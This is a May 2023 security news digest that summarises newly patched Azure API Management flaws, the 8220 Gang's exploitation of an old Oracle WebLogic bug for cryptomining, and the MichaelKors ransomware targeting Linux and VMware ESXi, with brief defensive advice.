18th May, 2023
3 Vulnerabilities Found in Microsoft Azure API Management Service
Microsoft Azure API Management service recently addressed three security flaws disclosed by Israeli cloud security firm Ermetic. The vulnerabilities included two server-side request forgery (SSRF) issues and an unrestricted file upload flaw in the API Management developer portal. Exploiting these flaws could have allowed attackers to access sensitive information, bypass security measures, and execute unauthorized code. However, Microsoft swiftly patched the vulnerabilities after responsible disclosure. Ensuring the security of cloud-based services remains an ongoing challenge, and prompt action is vital to maintain the integrity of such platforms.
Advanced Phishing-as-a-Service Platform Targeting Microsoft 365 Users
8220 Gang Exploiting Oracle WebLogic Flaw for Crypto-Mining
The cryptojacking group known as 8220 Gang has been using a six-year-old security flaw in Oracle WebLogic servers to carry out attacks. The flaw, known as CVE-2017-3506, allows attackers to remotely execute arbitrary commands. By exploiting this vulnerability, the group can gain unauthorized access to sensitive data or compromise entire systems. 8220 Gang, previously documented by Cisco Talos, targets vulnerable Oracle WebLogic and Apache web servers to deploy cryptocurrency mining malware. They use off-the-shelf malware downloaders and crypters to conceal their activities and evade detection. In their latest attack chain, they exploit the Oracle WebLogic Server vulnerability to deliver a PowerShell payload, which then creates another obfuscated PowerShell script in memory. Once a few more requirements have been met, the malware then communicates to a c2 server through port 9090, 9091 or 9092.
Targeting Linux and VMware ESXi Systems: Introducing the Latest 'MichaelKors' Ransomware-as-a-Service
A new ransomware-as-a-service (RaaS) operation named MichaelKors has emerged, specifically targeting Linux and VMware ESXi systems. This development indicates a growing focus of cybercriminals on ESXi, according to a report by cybersecurity firm CrowdStrike. ESXi, a widely used virtualization and management system, lacks support for third-party agents or antivirus software, making it an attractive target for attackers.The technique of targeting VMware ESXi hypervisors with ransomware, known as hypervisor jackpotting, has been employed by various ransomware groups in the past. SentinelOne's analysis revealed that leaked Babuk source code was utilized by 10 ransomware families to develop lockers for VMware ESXi hypervisors.Several e-crime outfits, such as ALPHV, Black Basta, Defray, ESXiArgs, LockBit, Nevada, Play, Rook, and Rorschach, have updated their tactics to target ESXi. Attackers exploit compromised credentials and gain elevated privileges to access the hypervisor, enabling them to run malicious ELF binaries and exploit vulnerabilities.The appeal of targeting VMware ESXi hypervisors lies in their direct access to physical servers, granting attackers control over the underlying resources. The lack of security tools, network segmentation, and existing vulnerabilities in ESXi environments make them a prime target.To combat hypervisor jackpotting, organizations are advised to limit direct access to ESXi hosts, implement two-factor authentication, regularly back up ESXi datastore volumes, apply security updates, and conduct security posture reviews.As more organizations adopt cloud environments and transfer workloads to VMware-based virtualization infrastructure, the targeting of ESXi poses a significant concern. VMware plans to update their knowledge base article with current information, acknowledging the need for revised security measures.